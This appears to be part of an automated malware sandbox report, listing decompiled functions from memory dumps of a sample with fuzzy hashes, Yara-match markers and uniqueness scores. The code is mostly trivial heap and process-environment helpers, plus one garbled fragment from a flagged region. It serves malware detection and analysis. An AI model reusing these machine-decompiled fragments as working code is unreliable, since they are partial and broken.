0x05454216
0x0545421d
0x05454222
0x0545422c
0x05454231
0x05454231
0x05454236
0x0545423d
0x0545423d
0x05454247

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e149fd5f87d30326335de92541423d2bcfb5e8e3a6734a7e323d592ecb7d432
Instruction ID: 8cdcaf9c737cb1bd0e72a1771460699cd3821a6aac1eb4a9d6022e8667fda5da
Opcode Fuzzy Hash: 5e149fd5f87d30326335de92541423d2bcfb5e8e3a6734a7e323d592ecb7d432
Instruction Fuzzy Hash: BDF03075960700CFEBA8DF65D9097E4BEBCF74436AF90495BA404AB285CB744481CF15

Uniqueness

Uniqueness Score: -1.00%

Function 0547D380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0547D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L053CE8B0(__ecx, _a4, 0xfff);
					L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0547d38a
0x0547d39b
0x0547d3b1
0x00000000
0x0547d3b6
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 8027ab09e19d03487da956ab7fb41b81f85df8361ce658e61053084e1ad4d2c6
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 1BE0CD31340258B7DB225E44CC00FF57B56DF40790F104035FD045A790C5759C51D6C4

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3D7, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040C3D7(void* __eax, signed int __ebx, void* __ecx, void* __edi) {
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;

				_t15 = __edi;
				_t13 = __ecx;
				 *(_t16 - 0x1ca0735c) =  *(_t16 - 0x1ca0735c) | __ebx;
				goto L1;
				_t10 = _t16;
				asm("o16 xor dh, [ebp-0x10]");
			}

0x0040c3d7
0x0040c3d7
0x0040c3dc
0x0040c3dc
0x0040c3e6
0x0040c3e9

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b2ae608ab941105dfe3fd33c1b02e08b8c8583d92ed9b3b16100664e84319c8
Instruction ID: a0c1062a1e0a50b4bdd853bd34b2dc8a35f89969201eabfb93c1857ed155adef
Opcode Fuzzy Hash: 1b2ae608ab941105dfe3fd33c1b02e08b8c8583d92ed9b3b16100664e84319c8
Instruction Fuzzy Hash: 1DD0A721E91301868B188E056847436FB71EA56261F9077AFDD0AE2550A1B1583089D9

Uniqueness

Uniqueness Score: -1.00%

Function 053FA185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053FA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x54b67e4 >= 0xa) {
					if(_t5 < 0x54b6800 || _t5 >= 0x54b6900) {
						return L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E053E0010(0x54b67e0, _t5);
				}
			}

0x053fa190
0x053fa1a6
0x053fa1c2
0x00000000
0x00000000
0x00000000
0x053fa192
0x053fa192
0x053fa19f
0x053fa19f

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9fe2f0f6c78dd8157b92c017b2abbf7c0a2666e9fb4b50e07d42e25514de8a5
Instruction ID: 36bdd85f99eb36d8f1a0a32d950175d6ac4f671edf1edc61429aebd71f6b788b
Opcode Fuzzy Hash: f9fe2f0f6c78dd8157b92c017b2abbf7c0a2666e9fb4b50e07d42e25514de8a5
Instruction Fuzzy Hash: 5BD05B7127504066F61D975099A8BB53266E784710FB3480EF20B4A5D0DFD08CD59228

Uniqueness

Uniqueness Score: -1.00%

Function 053F16E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053F16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E053F1710(0x54b67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L053E4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x053f16e8
0x053f16ef
0x053f16f3
0x053f16fe
0x00000000
0x053f1700
0x053f170d
0x053f170d
0x053f16f2
0x053f16f2
0x053f16f2
0x053f16f2

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 784b3ff2a713794214a4d79ff5a6eb048eda3099a361e11c3c9cd78f1ce17c44
Instruction ID: c71a5b975450cfd413be2b7133812eedb6d8c6f823b99b78d6b192d13860eee0
Opcode Fuzzy Hash: 784b3ff2a713794214a4d79ff5a6eb048eda3099a361e11c3c9cd78f1ce17c44
Instruction Fuzzy Hash: 8FD0A931200200E2EE2D5B10E848B1432A6EB80B81F38006CF70B998C0DFE5DCA2E25C

Uniqueness

Uniqueness Score: -1.00%

Function 054453CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054453CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E053DEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x054453ca
0x054453ce
0x054453d9
0x054453de
0x054453e1
0x054453e1
0x054453e6
0x054453f3
0x00000000
0x054453f8
0x054453fb

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 977817b664240e4791587431ded9699cfd1f86cd588523b9fee27227325964bd
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: EEE08C32A487809BDF12EB48D654F9EB7F9FB44B00F140084A0096F760C624AC00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00406A94, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9745f2ba48b221d6a2d5b11c37d2162fb96841b3bc32443560bd6841aa63c0a8
Instruction ID: d86dc0dd7836224d384db7a473657d8a55f6d2151fd954e2b44a29b628f03931
Opcode Fuzzy Hash: 9745f2ba48b221d6a2d5b11c37d2162fb96841b3bc32443560bd6841aa63c0a8
Instruction Fuzzy Hash: FEC09B73D3610401D5200C4D79401F4D358D7A3575F0027A7DC49E77229447D95101CD

Uniqueness

Uniqueness Score: -1.00%

Function 053F35A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053F35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E053DEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x053f35a1
0x053f35a1
0x053f35a5
0x053f35ab
0x053f35ab
0x053f35b5
0x00000000
0x053f35c1
0x053f35b7

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 3c867f232aa1d5ee18165258c381c63cf799d95eab0a9615d27fadc73b494acc
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 9BD0A9326092809ADF01EB10C218B6C77B6BB8030AF582865824A0AB62C37A4A0EE700

Uniqueness

Uniqueness Score: -1.00%

Function 053DAAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053DAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x053daab6
0x053daabb
0x0542a442
0x00000000
0x0542a448
0x0542a454
0x0542a454
0x053daac1
0x053daac1
0x053daac6
0x053daac6

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 1e183344ce518644ab3453c3b49b5f2c8af88f684b7c7dc350b69b0eb957d210
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 8DD0C939352990CFD616CB0DC554B1673B4BB04B40FC505D0E801CB761E66CD940CA00

Uniqueness

Uniqueness Score: -1.00%

Function 0544A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0544A537(intOrPtr _a4, intOrPtr _a8) {

				return L053E8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0544a553

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: ac6c1c25cac900373e2126d205d51e74d93a1429bc4db6efe1e6cc3742729479
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: E9C08C33180248BBCB126F81CC00F16BF6AFB94B60F008010FA080B5B0C632E970EB84

Uniqueness

Uniqueness Score: -1.00%

Function 053CDB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053CDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L053E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x053cdb4d
0x053cdb54
0x053cdb5f
0x053cdb56
0x053cdb56
0x053cdb5c
0x053cdb5c

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: a9e5113ad007e35b31604ed15de25f17a00c415f858662231417459ea14c6d6d
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: ACC08C30380A40AAEF222F20CD01B003AA0BB01B01F4404A07301DA0F0EBBCDC01E600

Uniqueness

Uniqueness Score: -1.00%

Function 053CAD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053CAD30(intOrPtr _a4) {

				return L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x053cad49

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 47290ba14f6c3c591b3a37fdda56c935d786ff560054173be984f3d43e977dc8
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 3DC02B331C0288BBC7126F45DD00F117F6DE790B60F000020F6044B6B1C932EC61D588

Uniqueness

Uniqueness Score: -1.00%

Function 053D76E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053D76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x053d76e4
0x00000000
0x053d76f8
0x053d76fd

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: aec0e43680f0fad7dc968fb69e79fcbf7fdbd989613b9499305ecf969ae88326
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 02C08C722411C05AEB2A5708DE24F30B6A0FB08608F48019CAA02594E1D3AAA803C218

Uniqueness

Uniqueness Score: -1.00%

Function 053F36CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053F36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L053E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x053f36d2
0x053f36e8
0x053f36d4
0x053f36e5
0x053f36e5

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 7debec8a9e2bff8c6c4d5d3ffabfebaf5425393dd4562d517a734682a4253f0b
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 0DC09B75355440BBDF155F30CD55F157294F745A61F6407547321455F0D56D9C40D608

Uniqueness

Uniqueness Score: -1.00%

Function 053E3A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053E3A1C(intOrPtr _a4) {
				void* _t5;

				return L053E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x053e3a35

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 011daa2ee29015929f1e6e0dc99fb263ed6c90c55d6c434c873ff3fa7e4f7572
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 11C04C32180648BBCB126E45DD05F157B69E795B60F154021B6040A5A18576ED61D59C

Uniqueness

Uniqueness Score: -1.00%

Function 053E7D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053E7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x053e7d56
0x053e7d5b
0x053e7d60
0x053e7d5d
0x053e7d5d
0x053e7d5d

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 54abde77420be0dfacd002f13f5a6e08307ab92a8cb404bb7e8f8fbab63db5b6
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: CAB01234301981CFCF16DF18C080F2633F8FB44B80F8400D0E400CBA20D329E800CA00

Uniqueness

Uniqueness Score: -1.00%

Function 053F2ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053F2ACB() {
				void* _t5;

				return E053DEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x053f2adc

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 5ce6d2ae6426a96a265853e1cd445ee52549961208b25b94b016ba5803ce7965
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 6AB01233D10540CFCF02FF40D610B19B735FB00750F05449090012BA30C228BC01EB40

Uniqueness

Uniqueness Score: -1.00%

Function 05409560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5f858bd8f12883df82dac18c7c26430b87921869282ae859bff1119b1c27fba
Instruction ID: 61e6e580413df1d9f8571ca8a1c7cbd689228366b35abd673ea05338994a281c
Opcode Fuzzy Hash: b5f858bd8f12883df82dac18c7c26430b87921869282ae859bff1119b1c27fba
Instruction Fuzzy Hash: 719002B5721010020145A559064454B0865A7D63913D1C416F5406590CD76188656365

Uniqueness

Uniqueness Score: -1.00%

Function 05409520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 133a4251547a5377ee75cd9c242d7854c32b4ec42fcbe9d35b24a54ca8bb513c
Instruction ID: c69f916cd07f4ace605d2c120fa76f39d7a83bd2448f537cb5332769ba9184c9
Opcode Fuzzy Hash: 133a4251547a5377ee75cd9c242d7854c32b4ec42fcbe9d35b24a54ca8bb513c
Instruction Fuzzy Hash: 7A9002F1701150924500A2598444B4A492597E0241B91C417E5044560CD6658851A179

Uniqueness

Uniqueness Score: -1.00%

Function 0540AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d1ff655a1857791615810d105f1db66443b464ed6c3223fe9add104a3957825
Instruction ID: 4cd87305975e02584b7967f618de6d23935b1ef62bee85988ea7157ecd8f8269
Opcode Fuzzy Hash: 4d1ff655a1857791615810d105f1db66443b464ed6c3223fe9add104a3957825
Instruction Fuzzy Hash: 5B9002B1F05010129140715948546864426A7E0781B95C412A4504554C9A948A5563E5

Uniqueness

Uniqueness Score: -1.00%

Function 054095F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a217cf351bb716b549bf28a451d1c7dedfd2bc1bfaeb2f1823add2d9d3ee008d
Instruction ID: 4396aa86f28f9752b3e9c5485f1c4e4286324190d5fb04fe48db5678ede7fb4d
Opcode Fuzzy Hash: a217cf351bb716b549bf28a451d1c7dedfd2bc1bfaeb2f1823add2d9d3ee008d
Instruction Fuzzy Hash: D99002B170101802D104615948446C6042597D0341F91C412AA014655EA7A588917175

Uniqueness

Uniqueness Score: -1.00%

Function 05409760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edf92bee43eb824c57a510c82183dfda4498f6a56fb5117f31575445fc1beb46
Instruction ID: 116e11570cf42c78c76effeada5ae0c681832203e8bb5d2cbd5d92977378b6e9
Opcode Fuzzy Hash: edf92bee43eb824c57a510c82183dfda4498f6a56fb5117f31575445fc1beb46
Instruction Fuzzy Hash: 689002B170101403D10061595548747042597D0241F91D812A4414558DE79688517165

Uniqueness

Uniqueness Score: -1.00%

Function 0540A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a67718aca398f4a6c3fb0643f048677ac99e7ece81a4fe1052deb6003a18351d
Instruction ID: d1f614fb66b14dda75d3cffe2f55a8f285a23d064633473c6b26a7c2787d355f
Opcode Fuzzy Hash: a67718aca398f4a6c3fb0643f048677ac99e7ece81a4fe1052deb6003a18351d
Instruction Fuzzy Hash: DE9002B570505442D50065595844AC7042597D0345F91D812A441459CD97948861B165

Uniqueness

Uniqueness Score: -1.00%

Function 05409770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e218911c9d277745bba5098f980639f60632ee5008dc1a6d298b332d809599f
Instruction ID: ba0efcabe47b52080408d0d2cdc3e8bec1d25d6fd775e4e15d026dc34dc2ab13
Opcode Fuzzy Hash: 5e218911c9d277745bba5098f980639f60632ee5008dc1a6d298b332d809599f
Instruction Fuzzy Hash: CB9002B170505442D10065595448A46042597D0245F91D412A5054595DD7758851B175

Uniqueness

Uniqueness Score: -1.00%

Function 0540A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 947b6576f5ddc54e9eda53ff28525636706e6e8729f00824e1fc307c30298f55
Instruction ID: c00e1902d5b6dc422fa01a1be413dd392e551300c1ac79300acffde94d327ec6
Opcode Fuzzy Hash: 947b6576f5ddc54e9eda53ff28525636706e6e8729f00824e1fc307c30298f55
Instruction Fuzzy Hash: 489002B1701010529500A6995844A8A452597F0341B91D416A8004554C969488616165

Uniqueness

Uniqueness Score: -1.00%

Function 05409730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9401b9fa706d3682655a971b4d3f5b3845d0f97cd0df47116fa1c7c47f330d89
Instruction ID: 0f49482c4e62c34019359a86736ffd7fdc8d6ed030019fa24d2052beaae9eb18
Opcode Fuzzy Hash: 9401b9fa706d3682655a971b4d3f5b3845d0f97cd0df47116fa1c7c47f330d89
Instruction Fuzzy Hash: 629002B1B0501402D14071595458746043597D0241F91D412A4014554DD7998A5576E5

Uniqueness

Uniqueness Score: -1.00%

Function 05409650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed073164bce77bf80252b8bf0d5d9889397e582931557069653f5ba99810ee25
Instruction ID: 2344d9b69877059c960a94a0ed20865d81d37978eb02314f515d80902199f718
Opcode Fuzzy Hash: ed073164bce77bf80252b8bf0d5d9889397e582931557069653f5ba99810ee25
Instruction Fuzzy Hash: 059002B170505842D14071594444A86043597D0345F91C412A4054694DA7658D55B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 05409610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 658a4795027b7c1e29f1f762e23cd5020a297d9cfd8cbf12e47fa1dde4905535
Instruction ID: c57b5ba6e0aa3d027bf45148810be32d390b6a5f27b48bf49885ff78b22020fd
Opcode Fuzzy Hash: 658a4795027b7c1e29f1f762e23cd5020a297d9cfd8cbf12e47fa1dde4905535
Instruction Fuzzy Hash: 3B9002B1B0501802D15071594454786042597D0341F91C412A4014654D97958A5576E5

Uniqueness

Uniqueness Score: -1.00%

Function 054096D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e1cae2f35b468114721bb3c3a81759d8e23aa104fc01b6d3d700b0d14cdc14f
Instruction ID: 0380e39e15296ede156f456c57e2bcc91f2603639bc45d1b712152e97db66b07
Opcode Fuzzy Hash: 1e1cae2f35b468114721bb3c3a81759d8e23aa104fc01b6d3d700b0d14cdc14f
Instruction Fuzzy Hash: 739002B170101842D10061594444B86042597E0341F91C417A4114654D9755C8517565

Uniqueness

Uniqueness Score: -1.00%

Function 05409950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a219c2caf517d7c92a9f37cc6cb85f9398808b2c2fa3c0c8ef036ade59f1a53
Instruction ID: e91a795e6b5ef6a38d028b185e6a1864f2d7552df893ef8152c0caea1997ab6c
Opcode Fuzzy Hash: 4a219c2caf517d7c92a9f37cc6cb85f9398808b2c2fa3c0c8ef036ade59f1a53
Instruction Fuzzy Hash: A79002F170141403D14065594844647042597D0342F91C412A6054555E9B698C517179

Uniqueness

Uniqueness Score: -1.00%

Function 054099D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7ae9cee5517efbfabd48e8dd99650a0503e5b30a194f3ad16d17f5722944ef3
Instruction ID: f288b3db3a2fb23702b0bd01bf7662cd42527f7750f52b9f7c0876ce3b83f89d
Opcode Fuzzy Hash: f7ae9cee5517efbfabd48e8dd99650a0503e5b30a194f3ad16d17f5722944ef3
Instruction Fuzzy Hash: 3A9002F171101042D10461594444746046597E1241F91C413A6144554CD6698C616169

Uniqueness

Uniqueness Score: -1.00%

Function 0540B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 241d6095842799c85f74e4c5125243d3b6bf6fdc004c0cea6e5e97df17e5eab6
Instruction ID: 2753b10463abd9ff79606f71468f937b379e5030a287b9be633174c9899e0201
Opcode Fuzzy Hash: 241d6095842799c85f74e4c5125243d3b6bf6fdc004c0cea6e5e97df17e5eab6
Instruction Fuzzy Hash: 3C9002F1B01150434540B15948444465435A7E13413D1C522A4444560C97A88855A2A9

Uniqueness

Uniqueness Score: -1.00%

Function 05409820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdebe30ee049c1a05a24193f0724a5edc62de35403717fd203b6cbaf5ab4718e
Instruction ID: d49fb5ce4bc6d81ac9731dd956a54dfb919686c522fe7a15406f6daa5415c6f2
Opcode Fuzzy Hash: cdebe30ee049c1a05a24193f0724a5edc62de35403717fd203b6cbaf5ab4718e
Instruction Fuzzy Hash: 9F9002B174101402D141715944446460429A7D0281FD1C413A4414554E97958A56BAA5

Uniqueness

Uniqueness Score: -1.00%

Function 054098A0, Relevance: .0, Instructions: 4COMMON

